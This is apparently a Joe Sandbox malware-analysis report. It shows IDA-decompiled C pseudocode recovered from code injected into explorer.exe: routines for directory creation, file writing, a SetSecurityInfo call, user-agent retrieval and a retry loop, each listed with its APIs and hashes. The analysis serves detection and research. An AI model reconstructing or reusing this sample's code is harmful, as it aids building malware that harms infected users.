                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
                  • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
                  • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                  				WCHAR* _v8;
                  				char _v12;
                  				char _v44;
                  				char _v564;
                  				char _v1084;
                  				void* __esi;
                  				void* _t23;
                  				struct _SECURITY_ATTRIBUTES* _t25;
                  				int _t27;
                  				char _t32;
                  				char _t38;
                  				intOrPtr _t39;
                  				void* _t40;
                  				WCHAR* _t41;
                  				void* _t54;
                  				char* _t60;
                  				char* _t63;
                  				void* _t70;
                  				WCHAR* _t71;
                  				intOrPtr* _t73;
                  
                  				_t70 = __ecx;
                  				_push(__ecx);
                  				E0008B700(__edx,  &_v44, __eflags, __fp0);
                  				_t52 = _t70;
                  				if(E0008BB8D(_t70) == 0) {
                  					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
                  					_pop(_t54);
                  					__eflags = _t23;
                  					if(__eflags == 0) {
                  						_t71 = E00082C64( &_v1084, __eflags);
                  					} else {
                  						E0008B012(_t54,  &_v564); // executed
                  						_t32 = E0008109A(_t54, 0x375);
                  						_push(0);
                  						_v12 = _t32;
                  						_push( &_v44);
                  						_t60 = "\\";
                  						_push(_t60);
                  						_push(_t32);
                  						_push(_t60);
                  						_push( &_v564);
                  						_push(_t60);
                  						_t71 = E000892E5( &_v1084);
                  						E000885D5( &_v12);
                  					}
                  				} else {
                  					_t38 = E0008109A(_t52, 0x4e0);
                  					 *_t73 = 0x104;
                  					_v12 = _t38;
                  					_t39 =  *0x9e684; // 0xe7f8f0
                  					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                  					_t78 = _t40;
                  					if(_t40 != 0) {
                  						_t41 = E0008109A( &_v564, 0x375);
                  						_push(0);
                  						_v8 = _t41;
                  						_push( &_v44);
                  						_t63 = "\\";
                  						_push(_t63);
                  						_push(_t41);
                  						_push(_t63);
                  						_t71 = E000892E5( &_v564);
                  						E000885D5( &_v8);
                  					} else {
                  						_t71 = E00082C64( &_v44, _t78);
                  					}
                  					E000885D5( &_v12);
                  				}
                  				_v8 = _t71;
                  				_t25 = E0008B269(_t71);
                  				if(_t25 == 0) {
                  					_t27 = CreateDirectoryW(_t71, _t25); // executed
                  					if(_t27 == 0 || E0008B269(_t71) == 0) {
                  						E0008861A( &_v8, 0xfffffffe);
                  						_t71 = _v8;
                  					}
                  				}
                  				return _t71;
                  			}

                  APIs
                  • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  • Opcode ID: 2a7b173c4ae1e61358d7ec6959bf71d08d6f29f55be685fc2dd38ddca234be52
                  • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
                  • Opcode Fuzzy Hash: 2a7b173c4ae1e61358d7ec6959bf71d08d6f29f55be685fc2dd38ddca234be52
                  • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00085AFF(intOrPtr __edx, void* __fp0) {
                  				short _v30;
                  				short _v32;
                  				short _v34;
                  				short _v36;
                  				intOrPtr* _t22;
                  				intOrPtr _t23;
                  				signed int _t30;
                  				intOrPtr _t38;
                  				intOrPtr* _t40;
                  				intOrPtr _t44;
                  				intOrPtr _t45;
                  				intOrPtr* _t46;
                  				signed int _t47;
                  				void* _t55;
                  
                  				_t55 = __fp0;
                  				_t45 = __edx;
                  				_t47 = 0;
                  				_t22 = E00088604(0x14);
                  				_t38 =  *0x9e688; // 0xb0000
                  				_t46 = _t22;
                  				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
                  					_v36 =  *((intOrPtr*)(_t38 + 0x228));
                  					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
                  					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
                  					_v30 = 0;
                  					GetDriveTypeW( &_v36); // executed
                  				}
                  				 *_t46 = 2;
                  				 *(_t46 + 4) = _t47;
                  				_t23 =  *0x9e688; // 0xb0000
                  				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
                  				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
                  				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
                  				if(_t40 == 0) {
                  					L9:
                  					if(E00082DCB() == 0) {
                  						goto L11;
                  					} else {
                  						_t47 = _t47 | 0xffffffff;
                  					}
                  				} else {
                  					_t45 =  *_t40;
                  					_t30 = _t47;
                  					if(_t45 == 0) {
                  						goto L9;
                  					} else {
                  						_t44 =  *((intOrPtr*)(_t40 + 4));
                  						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
                  							_t30 = _t30 + 1;
                  							if(_t30 < _t45) {
                  								continue;
                  							} else {
                  								goto L9;
                  							}
                  							goto L12;
                  						}
                  						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
                  							L11:
                  							E00084D6D(_t46, _t45, _t55);
                  						} else {
                  							goto L9;
                  						}
                  					}
                  				}
                  				L12:
                  				E0008A39E();
                  				E0008A39E();
                  				return _t47;
                  			}


















                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateDriveHeapType
                  • String ID:
                  • API String ID: 414167704-0
                  • Opcode ID: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
                  • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                  • Opcode Fuzzy Hash: cb03de1a2ba3e6c236d1db646638ddc4e840487864a8cce90740a25b4b3f0c80
                  • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 44%
                  			E0008BC7A(void* __ecx, void* __edx) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				char _t18;
                  				intOrPtr _t19;
                  				intOrPtr _t27;
                  				intOrPtr _t30;
                  				intOrPtr _t36;
                  				intOrPtr _t38;
                  				char _t39;
                  
                  				_t39 = 0;
                  				_t38 =  *0x9e674; // 0x210
                  				_v8 = 0;
                  				_v12 = 0;
                  				_v20 = 0;
                  				_v16 = 0;
                  				_t18 = E000895E1(__ecx, 0x84b);
                  				_push(0);
                  				_v24 = _t18;
                  				_push( &_v8);
                  				_push(1);
                  				_push(_t18);
                  				_t19 =  *0x9e68c; // 0xe7fab8
                  				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
                  					_push( &_v16);
                  					_push( &_v12);
                  					_push( &_v20);
                  					_t27 =  *0x9e68c; // 0xe7fab8
                  					_push(_v8);
                  					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
                  						_push(_v12);
                  						_t30 =  *0x9e68c; // 0xe7fab8
                  						_push(0);
                  						_push(0);
                  						_push(0);
                  						_push(0x10);
                  						_push(6);
                  						_push(_t38); // executed
                  						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
                  							_t39 = 1;
                  						}
                  					}
                  					_t36 =  *0x9e68c; // 0xe7fab8
                  					 *((intOrPtr*)(_t36 + 0x10))(_v8);
                  				}
                  				E000885D5( &_v24);
                  				return _t39;
                  			}
















                  APIs
                  • SetSecurityInfo.ADVAPI32(00000210,00000006,00000010,00000000,00000000,00000000,?,?,00083268,?,?,00000000,?,?,?,00085721), ref: 0008BCE9
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: InfoSecurity
                  • String ID:
                  • API String ID: 3528565900-0
                  • Opcode ID: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                  • Instruction ID: 4b82ffe8c45477c1650446b5343723a2aeaa491c0a074740823efd8a3710dd5b
                  • Opcode Fuzzy Hash: 49105266334ca50b45e4c17bdeae0f8f274821862b6dd8d3608f6b368af892b6
                  • Instruction Fuzzy Hash: 54113A72A00219BBDB10EF95DC49EEEBBBCFF04740F1040A6B545E7151DBB09A01CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E0008E450(void* __ecx, void* __edx) {
                  				char _v8;
                  				intOrPtr* _t5;
                  				intOrPtr _t10;
                  				intOrPtr* _t11;
                  				void* _t12;
                  
                  				_push(__ecx);
                  				_t5 =  *0x9e6b0; // 0x27907e8
                  				if( *_t5 == 0) {
                  					_v8 = E000895C7(0x2a7);
                  					 *0x9e788 = E000891A6(_t6, 0);
                  					E000885C2( &_v8);
                  					goto L4;
                  				} else {
                  					_v8 = 0x100;
                  					_t10 = E00088604(0x101);
                  					 *0x9e788 = _t10;
                  					_t11 =  *0x9e6b0; // 0x27907e8
                  					_t12 =  *_t11(0, _t10,  &_v8); // executed
                  					if(_t12 == 0) {
                  						L4:
                  						return 0;
                  					} else {
                  						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
                  					}
                  				}
                  			}









                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Heap$AgentAllocateFreeObtainStringUser
                  • String ID:
                  • API String ID: 471734292-0
                  • Opcode ID: 29236988d82dfaf5d7fccad8192a8dcf0ee0c80ce76389ae182468f900f99f52
                  • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                  • Opcode Fuzzy Hash: 29236988d82dfaf5d7fccad8192a8dcf0ee0c80ce76389ae182468f900f99f52
                  • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _t13;
                  				void* _t21;
                  				void* _t23;
                  				void* _t26;
                  
                  				_t23 = __ecx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t26 = 0;
                  				_v12 = __ecx;
                  				_t21 = __edx;
                  				if(_a4 == 0) {
                  					L3:
                  					_t13 = 1;
                  				} else {
                  					while(1) {
                  						_v8 = _v8 & 0x00000000;
                  						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                  							break;
                  						}
                  						_t26 = _t26 + _v8;
                  						_t23 = _v12;
                  						if(_t26 < _a4) {
                  							continue;
                  						} else {
                  							goto L3;
                  						}
                  						goto L4;
                  					}
                  					_t13 = 0;
                  				}
                  				L4:
                  				return _t13;
                  			}










                  APIs
                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                  • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A5F7(WCHAR* __ecx, long __edx) {
                  				intOrPtr _t6;
                  				long _t12;
                  				void* _t13;
                  
                  				_t12 = __edx;
                  				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                  				if(_t13 != 0xffffffff) {
                  					if(_t12 == 4) {
                  						_t6 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                  					}
                  					return _t13;
                  				}
                  				return 0;
                  			}







                  APIs
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                  • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0008A63B(WCHAR* __ecx) {
                  				signed int _t5;
                  
                  				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                  				_t2 = _t5 + 1; // 0x1
                  				asm("sbb ecx, ecx");
                  				return _t5 &  ~_t2;
                  			}





                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                  • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00088604(long _a4) {
                  				void* _t2;
                  
                  				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
                  				return _t2;
                  			}





                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                  • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008B269(WCHAR* __ecx) {
                  
                  				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                  			}




                  APIs
                  • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                  • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                  • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                  • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E000885EF() {
                  				void* _t1;
                  
                  				_t1 = HeapCreate(0, 0x80000, 0); // executed
                  				 *0x9e768 = _t1;
                  				return _t1;
                  			}





                  APIs
                  • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                  • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008F9BF(void* __edx) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				intOrPtr _t26;
                  				char _t27;
                  				intOrPtr _t29;
                  				void* _t31;
                  				void* _t36;
                  				char _t38;
                  				intOrPtr _t39;
                  				char _t42;
                  				intOrPtr _t51;
                  				intOrPtr _t52;
                  				intOrPtr* _t63;
                  				intOrPtr _t66;
                  				char* _t67;
                  				intOrPtr _t69;
                  				char _t78;
                  				void* _t81;
                  				void* _t82;
                  
                  				_t26 =  *0x9e654; // 0xe7fd30
                  				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
                  				_v12 = _t27;
                  				if(_t27 != 0) {
                  					_t63 =  *0x9e654; // 0xe7fd30
                  					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                  						E000886E1(_t27,  *_t63, 0x400);
                  						_v8 = 0;
                  						_t36 = E0008109A(_t63, 0x34a);
                  						_t66 =  *0x9e688; // 0xb0000
                  						_t72 =  !=  ? 0x67d : 0x615;
                  						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
                  						_push(0);
                  						_push(_t36);
                  						_t67 = "\\";
                  						_v24 = _t38;
                  						_push(_t67);
                  						_push(_t38);
                  						_t39 =  *0x9e688; // 0xb0000
                  						_push(_t67);
                  						_v20 = E000892E5(_t39 + 0x1020);
                  						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
                  						_v16 = _t42;
                  						E000885D5( &_v24);
                  						E000885D5( &_v20);
                  						_t73 = _v16;
                  						_t82 = _t81 + 0x3c;
                  						_t69 = _v8;
                  						if(_v16 != 0 && _t69 > 0x400) {
                  							_t51 =  *0x9e654; // 0xe7fd30
                  							_t52 =  *((intOrPtr*)(_t51 + 4));
                  							_t53 =  <  ? _t69 : _t52;
                  							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                  							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                  							_t69 = _v8;
                  							_t82 = _t82 + 0xc;
                  						}
                  						E0008861A( &_v16, _t69);
                  						E0008861A( &_v20, 0xfffffffe);
                  						_t27 = _v12;
                  						_t81 = _t82 + 0x10;
                  						_t63 =  *0x9e654; // 0xe7fd30
                  					}
                  					_t78 = 0;
                  					while(1) {
                  						_t29 =  *0x9e688; // 0xb0000
                  						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                  						_t81 = _t81 + 0xc;
                  						if(_t31 >= 0) {
                  							break;
                  						}
                  						Sleep(1);
                  						_t78 = _t78 + 1;
                  						if(_t78 < 0x2710) {
                  							_t27 = _v12;
                  							_t63 =  *0x9e654; // 0xe7fd30
                  							continue;
                  						}
                  						break;
                  					}
                  					E0008861A( &_v12, 0); // executed
                  				}
                  				return 0;
                  			}


























                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapSleep
                  • String ID:
                  • API String ID: 4201116106-0
                  • Opcode ID: 3e9156b20eb59e4c92d6fc07c2995c12944233af2d15c75beb7f17b6c82190fb
                  • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                  • Opcode Fuzzy Hash: 3e9156b20eb59e4c92d6fc07c2995c12944233af2d15c75beb7f17b6c82190fb
                  • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                  				char _v8;
                  				WCHAR* _v12;
                  				signed int _v16;
                  				WCHAR* _v20;
                  				short _t30;
                  				short _t33;
                  				intOrPtr _t38;
                  				intOrPtr _t43;
                  				intOrPtr _t45;
                  				short _t49;
                  				void* _t52;
                  				char _t71;
                  				WCHAR* _t72;
                  
                  				_v16 = _v16 & 0x00000000;
                  				_t71 = 0;
                  				_v12 = __ecx;
                  				_t49 = __edx;
                  				_v8 = 0;
                  				_t72 = E00088604(0x448);
                  				_v20 = _t72;
                  				_pop(_t52);
                  				if(_t72 != 0) {
                  					_t72[0x21a] = __edx;
                  					_t72[0x21c] = _a8;
                  					lstrcpynW(_t72, _v12, 0x200);
                  					if(_t49 != 1) {
                  						_t30 = E00088604(0x100000);
                  						_t72[0x212] = _t30;
                  						if(_t30 != 0) {
                  							_t69 = _a4;
                  							_t72[0x216] = 0x100000;
                  							if(_a4 != 0) {
                  								E000887EA(_t72, _t69);
                  							}
                  							L16:
                  							return _t72;
                  						}
                  						L7:
                  						if(_t71 != 0) {
                  							E0008861A( &_v8, 0);
                  						}
                  						L9:
                  						_t33 = _t72[0x218];
                  						if(_t33 != 0) {
                  							_t38 =  *0x9e684; // 0xe7f8f0
                  							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                  						}
                  						_t73 =  &(_t72[0x212]);
                  						if(_t72[0x212] != 0) {
                  							E0008861A(_t73, 0);
                  						}
                  						E0008861A( &_v20, 0);
                  						goto L1;
                  					}
                  					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
                  					_t71 = _t43;
                  					_v8 = _t71;
                  					if(_t71 == 0) {
                  						goto L9;
                  					}
                  					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
                  						goto L7;
                  					} else {
                  						_t45 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                  						_t72[0x218] = _t72[0x218] & 0x00000000;
                  						E0008861A( &_v8, 0);
                  						goto L16;
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}

















                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeaplstrcpyn
                  • String ID:
                  • API String ID: 680773602-0
                  • Opcode ID: df6e4e06fa4588dcc84ebd37a97368978606898b48b93b123ffa302d6b09557c
                  • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                  • Opcode Fuzzy Hash: df6e4e06fa4588dcc84ebd37a97368978606898b48b93b123ffa302d6b09557c
                  • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E0008E2C6(void* __fp0, intOrPtr _a4) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				void* _v24;
                  				void* _v28;
                  				char _v32;
                  				char _v544;
                  				signed int _t40;
                  				intOrPtr _t41;
                  				intOrPtr _t48;
                  				intOrPtr _t58;
                  				void* _t65;
                  				intOrPtr _t66;
                  				void* _t70;
                  				signed int _t73;
                  				void* _t75;
                  				void* _t77;
                  
                  				_t77 = __fp0;
                  				_v20 = 0;
                  				_v28 = 0;
                  				_v24 = 0;
                  				_t66 =  *0x9e6b4; // 0xe7fa98, executed
                  				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                  				if(_t40 == 0) {
                  					_t73 = 0;
                  					if(_v20 <= 0) {
                  						L9:
                  						_t41 =  *0x9e6b4; // 0xe7fa98
                  						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                  						return 0;
                  					}
                  					do {
                  						_v16 = 0;
                  						_v12 = 0;
                  						_t48 =  *0x9e68c; // 0xe7fab8
                  						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                  						_t70 = E00088604(_v16 + 1);
                  						if(_t70 != 0) {
                  							_v12 = 0x200;
                  							_push( &_v32);
                  							_push( &_v12);
                  							_push( &_v544);
                  							_push( &_v16);
                  							_push(_t70);
                  							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                  							_t58 =  *0x9e68c; // 0xe7fab8
                  							_push(0);
                  							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                  								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                  								_t75 = _t75 + 0xc;
                  								Sleep(0xa);
                  							}
                  						}
                  						_t73 = _t73 + 1;
                  					} while (_t73 < _v20);
                  					goto L9;
                  				}
                  				return _t40 | 0xffffffff;
                  			}






















                  APIs
                  • Sleep.KERNELBASE(0000000A), ref: 0008E394
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
                  • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                  • Opcode Fuzzy Hash: f9af068b09a86fde5e8217f41e56390a4a7112149cc446703cd783f1d72c3e17
